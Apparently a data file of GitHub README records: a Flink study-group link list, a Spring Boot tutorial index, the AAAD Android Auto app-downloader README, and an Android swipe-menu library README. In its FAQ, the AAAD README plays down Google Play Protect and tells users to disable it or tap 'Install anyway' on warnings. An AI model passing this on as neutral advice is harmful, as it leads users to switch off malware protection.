[能不能描述一下在窗口中,例如滚动窗口,多个事件进窗口后,事件在内存中保存的形式是怎么样的?会变成一个state?还是多个事件变成一个state?事件跟state的关系?事件时间过了在窗口是怎么清理事件的?如果state backends用的是RocksDBStateBackend,增量checkpoint,怎么清理已保存过期的事件咧?](https://t.zsxq.com/3vzzj62) + [请问一下 Flink的监控是如何做的?比如job挂了能告警通知。目前是想用Prometheus来做监控,但是发现上报的指标没有很符合的我需求。我这边用yarn-session启动的job,一个jobManger会管理多个job。Prometheus还是刚了解阶段可能遗漏了一些上报指标,球主大大有没有好的建议。](https://t.zsxq.com/vJyRnY7) + [ProcessTime和EventTime是否可以一起使用?当任务抛出异常失败的时候,如果配置了重启策略,重启时是不是从最近的checkpoint继续?遇到了一个数据库主键冲突的问题,查看kafka数据源发现该主键的消息只有一条,查看日志发现Redis连接池抛了异常(当时Redis在重启)导致任务失败重试,当时用的ProcessTime](https://t.zsxq.com/BuZJaUb) + [flink-kafka 自定义反序列化中如何更好的处理数据异常呢,有翻到前面一篇提问,如果使用 try-catch 捕获到异常,是抛出异常更好呢?还是return null 更好呢](https://t.zsxq.com/u3niYni) + [现在在用flink做上下游数据的比对,现在遇到了性能瓶颈,一个节点现在最多只能消费50条数据。观察taskmanager日志的gc日志发现最大堆内存有2.7g,但是新生代最大只有300m。能不能设置flink的jvm参数,flink on yarn启动模式](https://t.zsxq.com/rvJYBuB) + [请教一个原理性的问题,side out put和直接把一个流用两种方式处理有啥本质区别?我试了下,把一个流一边写缓存,一边入数据库,两边也都是全量数据](https://t.zsxq.com/Ee27i6a) + [如何定义一个flink window处理方式,1秒钟处理500条,1:kafka中有10000条数据时,仍旧1秒钟处理500条;2,kafka中有20条,每隔1秒处理一次。](https://t.zsxq.com/u7YbyFe) + [问一下大佬,网页UI可以进行savepoint的保存么?还是只能从savepoint启动?](https://t.zsxq.com/YfAqFUj) + [能否指定Kafka某些分区消费拉取消息,其他分区不拉取消息。现在有有很多场景,一个topic上百个分区,但是我只需要其中几个分区的数据](https://t.zsxq.com/AUfEAQB) + [我想过滤kafka 读到的某些数据,过滤条件从redis中拿到(与用户的配置相关,所以需要定时更新),总觉得怪怪的,请问有更好的方案吗?因为不提供redis的source,因此我是用jedis客户端来读取redis数据的,数据也获取不到,请问星主,flink代码在编写的时候,一般是如何调试的呢](https://t.zsxq.com/qr7UzjM) + [flink使用rocksdb状态检查点存在HDFS上,有的任务状态很小但是HDFS一个文件最小128M所以磁盘空间很快就满了,有没有啥配置可以自动清理检查点呢](https://t.zsxq.com/Ufqj2ZR) + [这是实时去重的问题。 举个例子,当发生订单交易的时候,业务中台会把该比订单消息发送到kafka,然后flink消费,统计总金额。如果因为业务中台误操作,发送了多次相同的订单过来(订单id相同),那么统计结果就会多次累加,造成统计的总金额比实际交易金额更多。我需要自定义在source里通过operate state去重,但是operate state是和每个source实例绑定,会造成重复的订单可能发送到不同的source实例,这样取出来的state里面就可能没有上一次已经记录的订单id,那么就会将这条重复的订单金额统计到最后结果中,](https://t.zsxq.com/RzB6E6A) + [双流join的时候,怎么能保证两边来的数据是对应的?举个例子,订单消息和库存消息,按逻辑来说,发生订单的时候,库存也会变,这两个topic都会同时各自发一条消息给我,我拿到这两条消息会根据订单id做join操作。问题是那如果库存消息延迟了5秒或者10秒,订单消息来的时候就join不到库存消息,这时候该怎么办?](https://t.zsxq.com/nunynmI) + [我这有一个比对程序用的是flink,数据源用的是flink-kafka,业务数据分为上下游,需要根据某个字段分组,相同的key上下游数据放一起比对。上下游数据进来的时间不一样,因此我用了一个可以迭代的窗口大小为5分钟window进行比对处理,最大迭代次数为3次。statebackend用的是fsstatebackend。通过监控发现当程序每分钟数据量超过2万条的时候,程序就不消费数据了,虽然webui上显示正常,而且jobmanager和taskmanager的stdout没有异常日志,但是程序就是不消费数据了。](https://t.zsxq.com/nmeE2Fm) + [异步io里面有个容量,是指同时多少个并发还是,假如我每个taskmanager核数设置10个,共10个taskmanager,那我这个数量只能设置100呢](https://t.zsxq.com/vjimeiI) + [有个性能问题想问下有没有相关的经验?一个job从kafka里读一个topic数据,然后进行分流,使用sideout分开之后直接处理,性能影响大吗?比如分开以后有一百多子任务。还有其他什么好的方案进行分流吗?](https://t.zsxq.com/mEeUrZB) + [线上有个作业抛出了一下异常,但是还能正常运行,这个怎么排查,能否提供一下思路](https://t.zsxq.com/Eayzr3R) 等等等,还有很多,复制粘贴的我手累啊 😂 另外里面还会及时分享 Flink 的一些最新的资料(包括数据、视频、PPT、优秀博客,持续更新,保证全网最全,因为我知道 Flink 目前的资料还不多) [关于自己对 Flink 学习的一些想法和建议](https://t.zsxq.com/AybAimM) [Flink 全网最全资料获取,持续更新,点击可以获取](https://t.zsxq.com/iaEiyB2) 再就是星球用户给我提的一点要求:不定期分享一些自己遇到的 Flink 项目的实战,生产项目遇到的问题,是如何解决的等经验之谈! 1、[如何查看自己的 Job 执行计划并获取执行计划图](https://t.zsxq.com/Zz3ny3V) 2、[当实时告警遇到 Kafka 千万数据量堆积该咋办?](https://t.zsxq.com/AIAQrnq) 3、[如何在流数据中比两个数据的大小?多种解决方法](https://t.zsxq.com/QnYjy7M) 4、[kafka 系列文章](https://t.zsxq.com/6Q3vN3b) 5、[Flink环境部署、应用配置及运行应用程序](https://t.zsxq.com/iiYfMBe) 6、[监控平台该有架构是长这样子的](https://t.zsxq.com/yfYrvFA) 7、[《大数据“重磅炸弹”——实时计算框架 Flink》专栏系列文章目录大纲](https://t.zsxq.com/beu7Mvj) 8、[《大数据“重磅炸弹”——实时计算框架 Flink》Chat 付费文章](https://t.zsxq.com/UvrRNJM) 9、[Apache Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) 10、[Flink On K8s](https://t.zsxq.com/eYNBaAa) 11、[Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) 12、[Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) 13、[Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) 14、[Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) 15、[Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) 16、[Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) 17、[Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) 18、[Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) 19、[Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) 20、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J) 21、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7) 22、[一文搞懂Flink内部的Exactly Once和At Least Once](https://t.zsxq.com/UVfqfae) 23、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) 当然,除了更新 Flink 相关的东西外,我还会更新一些大数据相关的东西,因为我个人之前不是大数据开发,所以现在也要狂补些知识!总之,希望进来的童鞋们一起共同进步! 1、[Java 核心知识点整理.pdf](https://t.zsxq.com/7I6Iyrf) 2、[假如我是面试官,我会问你这些问题](https://t.zsxq.com/myJYZRF) 3、[Kafka 系列文章和学习视频](https://t.zsxq.com/iUZnamE) 4、[重新定义 Flink 第二期 pdf](https://t.zsxq.com/r7eIeyJ) 5、[GitChat Flink 文章答疑记录](https://t.zsxq.com/ZjiYrVr) 6、[Java 并发课程要掌握的知识点](https://t.zsxq.com/QZVJyz7) 7、[Lightweight Asynchronous Snapshots for Distributed Dataflows](https://t.zsxq.com/VVN7YB2) 8、[Apache Flink™- Stream and Batch Processing in a Single Engine](https://t.zsxq.com/VVN7YB2) 9、[Flink状态管理与容错机制](https://t.zsxq.com/NjAQFi2) 10、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN) 11、[Flink Checkpoint-轻量级分布式快照](https://t.zsxq.com/QVFqjea) 12、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN) 13、[Stream Processing with Apache Flink pdf](https://t.zsxq.com/N37mUzB) 14、[Flink 结合机器学习算法的监控平台实践](https://t.zsxq.com/m6EAaQ3) 15、[《大数据重磅炸弹-实时计算Flink》预备篇——大数据实时计算介绍及其常用使用场景 pdf 和视频](https://t.zsxq.com/emMBaQN) 16、[《大数据重磅炸弹-实时计算Flink》开篇词 pdf 和视频](https://t.zsxq.com/fqfuVRR) 17、[四本 Flink 书](https://t.zsxq.com/rVBQFI6) 18、[流处理系统 的相关 paper](https://t.zsxq.com/rVBQFI6) 19、[Apache Flink 1.9 特性解读](https://t.zsxq.com/FyzvRne) 20、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne) 21、[基于Flink on Kubernetes的大数据平台](https://t.zsxq.com/FyzvRne) 22、[基于Apache Flink的高性能机器学习算法库](https://t.zsxq.com/FyzvRne) 23、[Apache Flink在快手的应用与实践](https://t.zsxq.com/FyzvRne) 24、[Apache Flink-1.9与Hive的兼容性](https://t.zsxq.com/FyzvRne) 25、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne) 26、[流处理系统的相关 paper](https://t.zsxq.com/rVBQFI6)
0
CodingDocs/springboot-guide
SpringBoot2.0+从入门到实战!
asynchronous dubbo mybatis rabbitmq spring-data-jpa springboot
👍推荐[2021最新实战项目源码下载](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=100018862&idx=1&sn=858e00b60c6097e3ba061e79be472280&chksm=4ea1856579d60c73224e4d852af6b0188c3ab905069fc28f4b293963fd1ee55d2069fb229848#rd) 👍[《JavaGuide 面试突击版》PDF 版本](#公众号) 。[图解计算机基础 PDF 版](#优质原创PDF资源) 书单已经被移动到[awesome-cs](https://github.com/CodingDocs/awesome-cs) 这个仓库。 <p align="center"> <a href="https://github.com/Snailclimb/springboot-guide" target="_blank"> <img src="https://my-blog-to-use.oss-cn-beijing.aliyuncs.com/2019-7/spring-boot-guide.png" width=""/> </a> </p> <p align="center"> <a href="https://snailclimb.gitee.io/springboot-guide "><img src="https://img.shields.io/badge/阅读-read-brightgreen.svg" alt="阅读"></a> <a href="#联系我"><img src="https://img.shields.io/badge/chat-微信群-blue.svg" alt="微信群"></a> <a href="#公众号"><img src="https://img.shields.io/badge/%E5%85%AC%E4%BC%97%E5%8F%B7-JavaGuide-lightgrey.svg" alt="公众号"></a> <a href="#公众号"><img src="https://img.shields.io/badge/PDF-Java面试突击-important.svg" alt="公众号"></a> </p> **在线阅读** : https://snailclimb.gitee.io/springboot-guide (上面的地址访问速度缓慢的建议使用这个路径访问) **开源的目的是为了大家能一起完善,如果你觉得内容有任何需要完善/补充的地方,欢迎提交 issue/pr。** - Github地址:https://github.com/CodingDocs/springboot-guide - 码云地址:https://gitee.com/SnailClimb/springboot-guide(Github无法访问或者访问速度比较慢的小伙伴可以看码云上的对应内容) ## 重要知识点 ### 基础 1. [Spring Boot 介绍](./docs/start/springboot-introduction.md) 2. [第一个 Hello World](./docs/start/springboot-hello-world.md) 3. [第一个 RestFul Web 服务](./docs/basis/sringboot-restful-web-service.md) 4. [Spring 如何优雅读取配置文件?](./docs/basis/read-config-properties.md) 5. **异常处理** :[Spring Boot 异常处理的几种方式](./docs/advanced/springboot-handle-exception.md)、[Spring Boot 异常处理在实际项目中的应用](./docs/advanced/springboot-handle-exception-plus.md) 6. **JPA** : [ Spring Boot JPA 基础:常见操作解析](./docs/basis/springboot-jpa.md) 、 [JPA 中非常重要的连表查询就是这么简单](./docs/basis/springboot-jpa-lianbiao.md) 7. **拦截器和过滤器** :[SpringBoot 实现过滤器](./docs/basis/springboot-filter.md) 、[SpringBoot 实现拦截器](./docs/basis/springboot-interceptor.md) 8. **MyBatis** :[整合 SpringBoot+Mybatis](./docs/basis/springboot-mybatis.md) 、[SpirngBoot2.0+ 的 SpringBoot+Mybatis 多数据源配置](./docs/basis/springboot-mybatis-mutipledatasource.md) (TODO:早期文章,不建议阅读,待重构~) 9. [MyBatis-Plus 从入门到上手干事!](./docs/MyBatisPlus.md) 10. [SpringBoot 2.0+ 集成 Swagger 官方 Starter + knife4j 增强方案](./docs/basis/swagger.md) ### 进阶 1. Bean映射工具 :[Bean映射工具之Apache BeanUtils VS Spring BeanUtils](./docs/advanced/Apache-BeanUtils-VS-SpringBean-Utils.md) 、[5种常见Bean映射工具的性能比对](./docs/advanced/Performance-of-Java-Mapping-Frameworks.md) 3. [如何在 Spring/Spring Boot 中优雅地做参数校验?](./docs/spring-bean-validation.md) 3. [使用 PowerMockRunner 和 Mockito 编写单元测试用例](./docs/PowerMockRunnerAndMockito.md) 4. [5分钟搞懂如何在Spring Boot中Schedule Tasks](./docs/advanced/SpringBoot-ScheduleTasks.md) 5. [新手也能看懂的 Spring Boot 异步编程指南](./docs/advanced/springboot-async.md) 6. [Kafka 入门+SpringBoot整合Kafka系列](https://github.com/Snailclimb/springboot-kafka) 7. [超详细,新手都能看懂 !使用Spring Boot+Dubbo 搭建一个分布式服务](./docs/advanced/springboot-dubbo.md) 8. [从零入门 !Spring Security With JWT(含权限验证)](https://github.com/Snailclimb/spring-security-jwt-guide) ### 补充 1. [`@PostConstruct`和`@PreDestroy` 简单使用以及Java9+中的替代方案](./docs/basis/@PostConstruct与@PreDestroy.md) ## 实战项目 1. [使用 Spring Boot搭建一个在线文件预览系统!支持ppt、doc等多种类型文件预览](./docs/projects/kkFileView-SpringBoot在线文件预览系统.md) 2. [ SpringBoot 前后端分离后台管理系统分析!分模块开发、RBAC权限控制...](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=2247495011&idx=1&sn=f574f5d75c3720d8b2a665d1d5234d28&chksm=cea1a2a8f9d62bbe9f13f5a030893fe3da6956c4be41471513e6247f74cba5a8df9941798b6e&token=212861022&lang=zh_CN#rd) 3. [一个基于Spring Cloud 的面试刷题系统。](./docs/projects/SpringCloud刷题系统.md) 4. [一个基于 Spring Boot 的在线考试系统](./docs/projects/一个基于SpringBoot的在线考试系统.md) ## 说明 1. 项目 logo 由 [logoly](https://logoly.pro/#/) 生成。 2. 利用 docsify 生成文档部署在 Github Pages 和 Gitee Pages: [docsify 官网介绍](https://docsify.js.org/#/) ### 优质原创PDF资源 ![](https://cdn.jsdelivr.net/gh/javaguide-tech/blog-images-2@main/%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%93%E4%B8%9A/image-20201027160348395.png) ### 公众号 如果大家想要实时关注我更新的文章以及分享的干货的话,可以关注我的公众号。 **《Java面试突击》:** 由本文档衍生的专为面试而生的《Java面试突击》V2.0 PDF 版本[公众号](#公众号)后台回复 **"Java面试突击"** 即可免费领取! **Java工程师必备学习资源:** 一些Java工程师常用学习资源公众号后台回复关键字 **“1”** 即可免费无套路获取。 ![我的公众号](https://my-blog-to-use.oss-cn-beijing.aliyuncs.com/2019-6/167598cd2e17b8ec.png)
0
shmykelsa/AAAD
null
null
# AAAD [![Crowdin](https://badges.crowdin.net/aaad/localized.svg)](https://crowdin.com/project/aaad) ![banner](https://i.imgur.com/EeT5Y3v.png) Android Auto Apps Downloader (AAAD) is an app for Android Phones that downloads popular Android Auto 3rd party apps and installs them in the correct way to have them in Android Auto. For the first time in 3 years, now users with **non-rooted Android devices** can enjoy these apps made for Android Auto, and Android Auto Apps Downloader does it all for you. Simply select an app you want to install on your phone and the download will begin. Once completed, install the given app with the classic Android interface and you can start enjoying the app you’ve just downloaded on Android Auto. ### No need for a PC. No developer options. No need of grabbing APKs and patch them. No root needed AAAD can be easily installed on any Android phone and the whole installing process takes place only on it. You will not need to activate developer settings, neither in main settings nor in Android Auto. The main goal of this app is having the listed apps in Android Auto with a pain free experience and, most of all, without requiring a rooted phone. If you are instead running a rooted device, you might want to consider the free alternative [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker), which has an alternative root method to patch the apps and it has a lot of other cool features that you can activate or pre-activate on Android Auto! AAAD is free and offers in app purchases. The free version of the app allows up to 1 download every 30 days. With the PRO version you can enjoy the full experience and download as many times as you want, forever! # 🚨🚨‼‼ KNOWN ISSUES ‼‼🚨🚨 **Oppo/Realme/OnePlus devices won't show apps or "No messages during drive"** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-OnePlus-Realme-Oppo) **Google Pixel: "No new messages during drive" - Android 13** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-Pixel-Android-13-) before installing **Android 14: Not compatible as of now** **"This organization is currently ineligible to receive donations" - Please download AAAD only from this website, 3rd party downloads are not authorized, endorsed nor supported by our staff** **GiroPay/Ideal/Przelewy24/Bancontact/EPS Payment has not been recognized by the app - Please follow[ this link](mailto:help.aaad@gmail.com?subject=AAADSI&body=Hello%2C%0D%0A%0D%0Athis%20is%20a%20pre-formatted%20e-mail.%20Please%20DO%20NOT%20edit%20the%20subject%20above%20and%20modify%20the%20e-mail%20with%20the%20right%20details.%20After%20sending%20the%20e-mail%20you%20will%20receive%20instructions%20on%20how%20to%20activate%20from%20email%20help.aaad%2Bcanned.response%40gmail.com.%20Please%20also%20check%20spam%20folder%20if%20nothing%20came%20to%20you.%0D%0A%0D%0AMethod%20of%20payment%3A%0D%0ALast%20four%20(4)%20digits%20of%20the%20card%20used%20(if%20applicable)%3A%0D%0ADate%20(and%20time%20if%20possible)%3A%0D%0AFull%20name%3A%0D%0A%0D%0A)** **Fermata Auto download shows "App not responding (wait or close)"** - Fermata is quite heavy to download and GitHub servers are not the easiest with downloads. Please keep pressing on "wait". If it does fail, select top menu, select help and contact us through the app describing the steps you take to reproduce the issue. **A factory reset wipes the license away** - [Click here](mailto:help.aaad@gmail.com?subject=PROWIPED&body=Hello%2C%0D%0A%0D%0Amy%20license%20was%20lost%20after%20a%20device%20reset.%0D%0A%0D%0AThe%20e-mail%20I%E2%80%99ve%20registered%20for%20my%20payment%20is%3A%20****MODIFY%20HERE****%0D%0A%0D%0ARegards%0D%0A%0D%0A>) **Google Play Protect erased the downloaded apps** - There's a deeper explanation [down here](#i-have-a-warning-from-google-play-protect-warning-me-about-your-app-is-this-app-a-malware). Please take a depp look before proceeding with installing any app. The install button is usually hidden and the big blue button **WILL NOT** install the app you've chosen. Please use the "Install anyway" button instead. ### [GO TO DOWNLOAD](https://github.com/shmykelsa/AAAD/releases) ### Updates If you want to stay updated with development, you can check out the [dedicated Telegram Channel](https://t.me/AAADupdates). Be sure to watch the repository with the banner on the top right, you will be notified via mail if AAAD gets updated (GitHub account needed)! Star us if you really think AAAD is a good software :) PRO version of the app can be activated directly and automatically inside the app and it will be bind to one device and the PRO or FREE version (including the date of next download) of the app will survive app uninstall. # Notes Android Auto Apps Downloader **does not grant** in any way that the provided apps available for installing will actually work on Android Auto. The installing method can fail anytime if Google applies changes to Android Auto. Any software installed by Android Auto Apps Downloader is provided "as it is" and no support can be given by me for malfunctioning apps or malfunctioning Android Auto. # F.A.Q. ### How can I have support for this app? You can contact help team through AAAD app (top right menu > "help"). We are a very small team working from Italy so please keep patience with us in case you write us over night! ### How do I obtain a license? To get started, press the bottom text of the AAAD app. ### Can I pay for a license outside the app? Sure you can. Feel free to [pay through Stripe](https://buy.stripe.com/14k5mQ3ih6l7dMs8ww) or donate any amount (equal or bigger than the asking price - 3.50 EUR) [via PayPal](https://www.paypal.com/donate/?hosted_button_id=V666UVPT9C5CJ), and keep the donation receipt (bank statement, confirmation page, e-mail etc.). Then please [click here](mailto:help.aaad@gmail.com?subject=%5BGW%5D&body=Please%20don%E2%80%99t%20modify%20the%20subject%20above%20and%20feel%20free%20to%20modify%20this%20body%20leaving%20a%20small%20thought.%20An%20automatic%20response%20will%20then%20guide%20you%20to%20the%20following%20steps%20%3A)) or write an e-mail to help.aaad@gmail.com and write "[GW]" in the subject, and be sure to include also a small thought :). An automatic reply will guide you to the stepts to take after. ### What will a license of AAAD give me? The license for AAAD pro will give you access to unlimited downloads. ### Do I have to buy a license to have the apps working while the vehicle is not parked? No. AAAD pro does only give access to unlimited downloads. ### I've downloaded the app "xxx" from AAAD but it's not working well. What can I do? The best thing is to ask the app's developer as we do not offer support for the apps inside AAAD. The apps are provided "as-is", and being developed by someone else, nobody from AAAD will be able to give the proper technical support for them. As long as the app is listed on Android Auto, apart from the "No new messages during drive" bug, then AAAD is working just as designed. If your app is not listed at all or suffers from the "No new messages during drive" contact help through AAAD app (top right menu > "help"). ### Why the heck do I need this app? Can’t I just install the apps by myslef? Well yes, you could, but they would not appear in Android Auto. Since the beginning of 2018 the custom apps for Android Auto are blocked by Google, but AAAD installs them in a special way in order to actually see the apps on Android Auto. And no root is needed! Call it magic, if you will. If you have a rooted phone, check out [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker) instead. ### I have a warning from Google Play Protect warning me about your app! Is this app a malware? AAAD does not contain any malware, and neither the apps inside it. Google obviously doesn't like Android Auto modding because of driving security. If you want to avoid any warning you'd want to know that Google Play Protect does not really have any anti-virus feature, rather it just warns of apps that Google doesn't like because of various reasons (e.g. installing other apps like Google Play Store does or contain third party in app purchase system). You can safely disable it by heading into Google Play Store's settings. ### Why only these apps? Where is YouTube? Where is Netflix? Where is Instagram? Not all apps are compatible with Android Auto. You can’t just pick an app and sledge-hammer it into Android Auto. As a rule of thumb, no app from Google Play Store will be ever included in AAAD (unless such app has a different APK distributed in another platform). Apps coming from the Play Store are automatically available on Android Auto. Obviously, Google allows only certain types of apps on its store (navigation, music, messages, VOIP). Whenever an app implements Android Auto as functionality, it can't be falling in a different category from the ones allowed by Google. AAAD includes basically almost every Android Auto app known to date, and the only responsibility of AAAD is to make them available in Android Auto. If you know for sure there's an app compatible with Android Auto that is not included in AAAD, write to [submit.aaad@gmail.com](mailto:submit.aaad@gmail.com) ### How do I update the apps installed from AAAD? AAAD will always download latest version of an app. If one of the apps that you've installed through AAAD gets an update, you can open AAAD and download the update. At the moment, there's no update checker, but I'm planning on making it! ### Will you hold my bank account/credit card informations? No. All the details of payment are held by Stripe Inc. and not processed nor passed to myself in any way. Also, I don't really care. ### Will this app be available on the Play Store? No. It is only officially distributed on GitHub. ### Has the license an expiration date? No. AAAD is not a subscription, and once a license is obtained you won't be charged anymore. ### What happens if I change my device? You can transfer a license with the feature "Transfer license" on the top right menu. The license will be crypted inside the device with a key that we will not hold in any way and the above method is the only way to move a license for AAAD pro. ### What happens if I uninstall AAAD? Nothing. The date for next download will not be impacted and neither your AAAD pro version. # License Part of the source code of the app is shared so that changes can be implemented by whoever wants to do so for personal use, the full version of the software is **NOT** free, and you are not allowed to redistirbute modified versions of it, neither as a free application, niether as a commercial product. If you are intending to do so please seek my explicit writing approval for doing so. However you are allowed to modify the software as you wish as long as the modified version is **only** ever used by yourself. For more informations [please read the EULA](https://github.com/shmykelsa/AAAD/blob/main/LICENSE). ### Copyright Gabriele Rizzo (shmykelsa) © - 2023 - Lecce, Italia
0
mcxtzhang/SwipeDelMenuLayout
The most simple SwipeMenu in the history, 0 coupling, support any ViewGroup. Step integration swipe (delete) menu, high imitation QQ, iOS. ~史上最简单侧滑菜单,0耦合,支持任意ViewGroup。一步集成侧滑(删除)菜单,高仿QQ、IOS。~
listview recyclerview sideslip-menu slide viewgroup
# SwipeDelMenuLayout [![](https://jitpack.io/v/mcxtzhang/SwipeDelMenuLayout.svg)](https://jitpack.io/#mcxtzhang/SwipeDelMenuLayout) #### [中文版文档](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/README-cn.md) Related blog: V1.0: http://blog.csdn.net/zxt0601/article/details/52303781 V1.2: http://blog.csdn.net/zxt0601/article/details/53157090 If you like,please give me a star, thank you very much ## Where to find me: Github: https://github.com/mcxtzhang CSDN: http://blog.csdn.net/zxt0601 gold.xitu.io: http://gold.xitu.io/user/56de210b816dfa0052e66495 jianshu: http://www.jianshu.com/users/8e91ff99b072/timeline *** # Important words: not for the RecyclerView or ListView, for the Any ViewGroup. # Intro This control has since rolled out in the project use over the past seven months, distance on a push to making it the first time, also has + 2 month. (before, I published an article. Portal: http://gold.xitu.io/entry/57d1115dbf22ec005f9593c6/detail, it describes in detail the control how V1.0 version is done.) During a lot of friends in the comment, put forward some improvement of ** in the issue, such as support setting sliding direction (or so), high imitation QQ interaction, support GridLayoutManager etc, as well as some bug **. I have been all real, repair **. And its packaging to jitpack, introducing more convenient**. Compared to the first edition, change a lot. So to arrange, new version. So this paper start with how to use it, and then introduces the features of it contains, in support of the property. Finally a few difficulties and conflict resolution. ItemDecorationIndexBar + SwipeMenuLayout (The biggest charm is 0 coupling at the controls,So, you see first to cooperate with me another library assembly effect): (ItemDecorationIndexBar : https://github.com/mcxtzhang/ItemDecorationIndexBar) ![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/ItemDecorationIndexBar_SwipeDel.gif) Casually to use in a flow layout also easy: ![](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/FlowSwipe.gif) Android Special Version (Without blocking type, when the lateral spreads menus, still can be expanded to other side menu, at the same time on a menu will automatically shut down): ![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/LinearLayoutManager1.gif) GridLayoutManager (And the above code than, need to modify RecyclerView LayoutManager): ![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/grid.gif) LinearLayout (Without any modification, even can simple LinearLayout implementation side menu): ![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/linear.gif) iOS interaction (Block type interaction, high imitation QQ, sideslip menu expansion, blocking other ITEM all operations): ![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/iOS.gif) use in ViewPager: ![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/viewpager.gif) # Usage: Step 1. Add the JitPack repository to your build file。 Add it in your root build.gradle at the end of repositories: ``` allprojects { repositories { ... maven { url "https://jitpack.io" } } } ``` Step 2. Add the dependency ``` dependencies { compile 'com.github.mcxtzhang:SwipeDelMenuLayout:V1.3.0' } ``` Step 3. Outside the need sideslip delete ContentItem on the controls, within the control lined ContentItem, menu: **At this point You can use high copy IOS, QQ sideslip delete menu functions** (Sideslip menu click events is by setting the id to get, in line with other controls, no longer here) Demo, I ContentItem is a TextView, then I'm in the outside its nested controls, and order, in the side menu, in turn, can arrange menu controls. ``` <?xml version="1.0" encoding="utf-8"?> <com.mcxtzhang.swipemenulib.SwipeMenuLayout xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="match_parent" android:layout_height="100dp" android:clickable="true" android:paddingBottom="1dp"> <TextView android:id="@+id/content" android:layout_width="match_parent" android:layout_height="match_parent" android:background="?android:attr/selectableItemBackground" android:gravity="center" android:text="项目中我是任意复杂的原ContentItem布局"/> <!-- 以下都是侧滑菜单的内容依序排列 --> <Button android:id="@+id/btnTop" android:layout_width="60dp" android:layout_height="match_parent" android:background="#d9dee4" android:text="置顶" android:textColor="@android:color/white"/> <Button android:id="@+id/btnUnRead" android:layout_width="120dp" android:layout_height="match_parent" android:background="#ecd50a" android:clickable="true" android:text="标记未读" android:textColor="@android:color/white"/> <Button android:id="@+id/btnDelete" android:layout_width="60dp" android:layout_height="match_parent" android:background="@color/red_ff4a57" android:text="删除" android:textColor="@android:color/white"/> </com.mcxtzhang.swipemenulib.SwipeMenuLayout> ``` **One Tips**: If it is used in the ListView, RecyclerView, click event Settings should be correct in the Adapter for ContentItem Settings, cannot use ListView. SetOnItemClickListener. When the Item is control, not the ContentItem inside the area, and there are a lot of touch judge the control area, internal contain ContentItem and sideslip Menu Menu. --- # Attributes: 1 Through isIos variable control whether IOS block type interaction, is on by default. 2 Through isSwipeEnable variable control whether open right menu, open by default. (in some scenarios, reuse item, no edit permissions the user cannot slide from right) 3 Through the left slide right slide switch isLeftSwipe support how to setting: One:xml: ```xml <com.mcxtzhang.swipemenulib.SwipeMenuLayout xmlns:app="http://schemas.android.com/apk/res-auto" app:ios="false" app:leftSwipe="true" app:swipeEnable="true"> ``` Other: java Codes: ```java //这句话关掉IOS阻塞式交互效果 并依次打开左滑右滑 禁用掉侧滑菜单 ((SwipeMenuLayout) holder.itemView).setIos(false).setLeftSwipe(position % 2 == 0 ? true : false).setSwipeEnable(false); ``` # Speciality: * don't simultaneously 2 + a side menu. (visible interface will appear, at most, only a side menu). * in the process of sideslip, banning parent slide up and down. * more refers to slide at the same time, the screen after the touch of a few fingers. * increase viewChache the get () method, which can be used in: when click on the external space, shut down is the slide of the menu. * to the first child Item (i.e. ContentItem) to control the width of the width # checklist: Will happen due to the last iteration, after completing a feature, fix a bug that caused new bug. So, to sort out a checkList for validation after each iteration, all through, will push to making library. feature | desc | verify --- |----------| --- isIos | Switch to the IOS obstruction interaction patterns, Android features non-blocking feature under interactive mode can work normally| isSwipeEnable |Whether to support close function of sideslip isLeftSwipe | Whether to support two-way sliding Click the ContentItem content | ContentItem content can be long press | Sideslip menu display, ContentItem not click | Sideslip menu is displayed, ContentItem not long press | Lateral spreads menu is displayed, sideslip can click on the menu | Sideslip menu is displayed, click ContentItem area close the menu | Lateral spreads, in the process of shielding long press event | By sliding off the menu, should not trigger ContentItem click event | **In addition**, In a ListView, click on the menu of sideslip options, if you want the sideslip menu closed at the same time, Will into CstSwipeDelMenu ItemView is strong, and call the `quickClose()`. Such as: `((CstSwipeDelMenu) holder. GetConvertView ()). QuickClose ();` It is recommended to use RecyclerView, In RecyclerView, if deleted, it is recommended to use mAdapter. NotifyItemRemoved (pos), Or delete no animation effects, and if you want to let the sideslip menu closed at the same time, also need to call at the same time `((CstSwipeDelMenu) holder. ItemView). QuickClose ();` --- ###Update log### 2017 09 27 update: * solving sliding conflicts in ViewPager:CstViewPager Because ViewPager and SwipMenuLayout are horizontal sliding controls. So, when used together, there will be conflicts. Using CstViewPager, you can use left slider on the first page of ViewPager. Use the right click menu on the last 